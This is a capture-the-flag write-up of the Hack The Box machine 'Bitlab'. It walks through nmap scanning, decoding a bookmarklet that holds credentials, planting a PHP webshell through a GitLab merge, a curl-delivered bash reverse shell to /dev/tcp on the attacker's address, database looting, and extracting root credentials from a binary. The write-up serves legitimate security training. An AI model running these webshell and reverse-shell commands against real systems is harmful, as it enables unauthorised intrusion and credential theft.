Bitlab

Last updated 2 years ago

Enumeration

As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.

The following nmap command scans the target machine for open ports quickly and saves the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.114 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, the fastest of nmap's timing templates.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allPorts file.

# Nmap 7.93 scan initiated Tue Mar 14 18:58:46 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.114
Nmap scan report for 10.10.10.114
Host is up (0.36s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

# Nmap done at Tue Mar 14 18:59:14 2023 -- 1 IP address (1 host up) scanned in 28.34 seconds

Now that we know which ports are open, let's identify the services and versions running on them. The following command scans these ports in more depth and saves the result into a file:

nmap -sC -sV -p22,80 10.10.10.114 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into a file, in this case the targeted file.

# Nmap 7.93 scan initiated Tue Mar 14 18:59:33 2023 as: nmap -sCV -p22,80 -Pn -oN targeted 10.10.10.114
Nmap scan report for 10.10.10.114
Host is up (0.041s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a23bb0dd2891bfe8f9308231232f9218 (RSA)
|   256 e63bfbb37f9a35a8bdd0277b25d4eddc (ECDSA)
|_  256 c9543d91017803ab16146bccf0b73a55 (ED25519)
80/tcp open  http    nginx
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.114/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 14 18:59:45 2023 -- 1 IP address (1 host up) scanned in 12.04 seconds

There is a GitLab Community Edition server on port 80, but there is no registration form, only the sign-in form.

Exploitation

If we click on Help, we'll see that directory listing is enabled and there is a file called bookmarks.html.

This file contains bookmarks for sites which are out of scope.

The exception is the last bookmark, called GitLab Login, which contains JavaScript code whose strings are hex-encoded.

We can decode it simply by echoing the string (with -e, so that bash interprets the \x escapes):

echo -e 'javascript:(function(){ var _0x4b18=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x61\x76\x65","\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })()'

javascript:(function(){ var _0x4b18=["value","user_login","getElementById","clave","user_password","11des0081x"];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })()

We get credentials for the clave user. Let's use them.

There is one snippet called Postgresql, which contains credentials for a PostgreSQL database.

There is also a project called Profile, which is served at http://10.10.10.114/profile.

We could try to create a new PHP webshell in the Profile project, and see if it is accessible.

Call it pwn.php, add the webshell, and click on Commit changes.

Then, complete the merge request, and click on Submit merge request.

Finally, merge the patch-1 branch into the master branch.

Now, the pwn.php file is located in the master branch of the Profile project, and we can run commands on the system.

curl 'http://10.10.10.114/profile/pwn.php?cmd=whoami'

www-data

Time to get a shell. Set up a netcat listener on port 4444 to catch the reverse shell.

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Finally, send a reverse shell to our machine on port 4444, and get a shell as www-data.

curl 'http://10.10.10.114/profile/pwn.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/10.10.14.8/4444%200%3E%261%22'

Listening on 0.0.0.0 4444
Connection received on 10.10.10.114 34096
bash: cannot set terminal process group (1296): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bitlab:/var/www/html/profile$ whoami
whoami
www-data

Privilege Escalation

First, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg

reset

Terminal type? xterm

Next, I export a few variables:

export TERM=xterm

export SHELL=bash

Finally, I run the following command on our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

The user.txt flag is in the home directory of the clave user, so we'll have to become clave.

find / -name user.txt 2>/dev/null

/home/clave/user.txt

As we can see in the netstat output, port 5432 on localhost is open, which is where the PostgreSQL database is listening.

netstat -tulpn

  • -t TCP connections.

  • -u UDP connections.

  • -l listening.

  • -p show the PID/Program name.

  • -n don't resolve names.

(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:8000            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3022          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 172.17.0.1:3000         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp    18432      0 127.0.0.53:53           0.0.0.0:*                           - 

Unfortunately, the psql tool is not available on the system.

psql

bash: psql: command not found

There is an alternative way to enumerate the database: PHP's PDO extension. The idea is to open PHP in interactive mode, create a new connection to the database with the credentials we found earlier, query everything from the profiles table, and fetch the results.

php --interactive

Interactive mode enabled

php > $connection = new PDO('pgsql:dbname=profiles;host=localhost', 'profiles', 'profiles');
php > $connect = $connection->query("select * from profiles");
php > $results = $connect->fetchAll();
php > print_r($results);
Array
(
    [0] => Array
        (
            [id] => 1
            [0] => 1
            [username] => clave
            [1] => clave
            [password] => c3NoLXN0cjBuZy1wQHNz==
            [2] => c3NoLXN0cjBuZy1wQHNz==
        )

)

This looks like a base64 string, but trying to decode it gives an error.

echo "c3NoLXN0cjBuZy1wQHNz==" | base64 -d

ssh-str0ng-p@ssbase64: invalid input

If we remove the == characters, we'll get the ssh-str0ng-p@ss password.

echo "c3NoLXN0cjBuZy1wQHNz" | base64 -d

ssh-str0ng-p@ss
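The == is rejected because 20 base64 characters already encode exactly 15 bytes, so no padding is allowed; base64 -d emits the 15 bytes it could decode and then reports the surplus padding as invalid input. The following Python helper is added here and is not part of the original writeup: it checks the padding against the data length and decodes after discarding any surplus padding, using the string recovered from the profiles table as a constructed sample.

```python
import base64
import re

# Data characters of the standard alphabet; '=' is handled separately.
B64_DATA = re.compile(r"[A-Za-z0-9+/]*")


def split_padding(s: str) -> tuple:
    """Return (data characters, count of trailing '=' characters)."""
    s = s.strip()
    data = s.rstrip("=")
    return data, len(s) - len(data)


def expected_padding(data_len: int) -> int:
    """Number of '=' a well-formed encoding of data_len characters carries.

    Every 4 characters carry 3 bytes. A final group of 2 or 3 characters
    is padded to 4; a full group (remainder 0) needs no padding at all,
    which is why 20 characters followed by '==' cannot be valid.
    """
    rem = data_len % 4
    if rem == 1:
        raise ValueError("a base64 length with remainder 1 is impossible")
    return (4 - rem) % 4


def check(s: str) -> dict:
    """Describe why a string decodes or fails under strict padding rules."""
    data, pads = split_padding(s)
    if not B64_DATA.fullmatch(data):
        raise ValueError("character outside the base64 alphabet")
    want = expected_padding(len(data))
    return {"data_chars": len(data), "expected_pad": want,
            "actual_pad": pads, "well_formed": pads == want}


def decode_lenient(s: str) -> bytes:
    """Drop whatever padding is present, re-pad correctly, then decode."""
    data, _ = split_padding(s)
    return base64.b64decode(data + "=" * expected_padding(len(data)))


if __name__ == "__main__":
    # Constructed sample: the value read from the profiles table on this box.
    stored = "c3NoLXN0cjBuZy1wQHNz=="
    print(check(stored))           # 20 data chars, expects 0 pads, got 2
    print(decode_lenient(stored))  # b'ssh-str0ng-p@ss'
```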

But this password is not valid for the clave user.

sshpass -p 'ssh-str0ng-p@ss' ssh clave@10.10.10.114

Permission denied, please try again.

But using the base64 string itself as the password is valid. Then, we'll be able to grab the user flag.

sshpass -p 'c3NoLXN0cjBuZy1wQHNz==' ssh clave@10.10.10.114

Last login: Thu Aug  8 14:40:09 2019
clave@bitlab:~$ whoami
clave
clave@bitlab:~$ cat user.txt 
3d5a9d4dbc5f4087d736838dbb607f8c

In clave's home directory there is one file called RemoteConnection.exe.

ls -l

total 20
-r-------- 1 clave clave 13824 Jul 30  2019 RemoteConnection.exe
-r-------- 1 clave clave    33 Mar 16 18:15 user.txt

As it is a Windows executable, let's transfer the file to our local machine.

scp clave@10.10.10.114:/home/clave/RemoteConnection.exe .

Then, transfer it to a Windows 7 32-bit machine by sharing the current directory over SMB:

impacket-smbserver smbFolder $(pwd) -smb2support

On the Windows machine, copy it to the desktop.

copy \\192.168.8.137\smbFolder\RemoteConnection.exe

If we run the binary from the CMD console, we'll get the following message.

RemoteConnection.exe

Access Denied !!

Let's analyze the binary with Immunity Debugger. Click on File > Open, and select the binary.

We can list all the text strings by doing Right click > Search for > All referenced text strings.

There is one string with an absolute path to the putty.exe binary.

Let's follow the string in the disassembler.

As we can see, that binary is trying to get some parameters.

Let's set a breakpoint right before this part of the binary gets executed.

Then, hit play to start running the program. When it reaches the breakpoint, it will stop and we should see the parameters in the EBX register.

As we can see, it contains the credentials of the root user. Log into the machine as root, and then all we have to do is reap the harvest and take the root flag.

sshpass -p 'Qf7]8YSV.wDNF*[7d?j&eD4^' ssh root@10.10.10.114

Last login: Wed Sep  7 13:12:33 2022
root@bitlab:~# whoami 
root
root@bitlab:~# cat root.txt 
6b4a156b373c924ac58f8a8689665754

If you try to run the binary and get two errors saying that MSVCR100.dll and MSVCP100.dll are missing, download the DLL files and place them in C:\Windows\System32.

MSVCR100.dll
MSVCP100.dll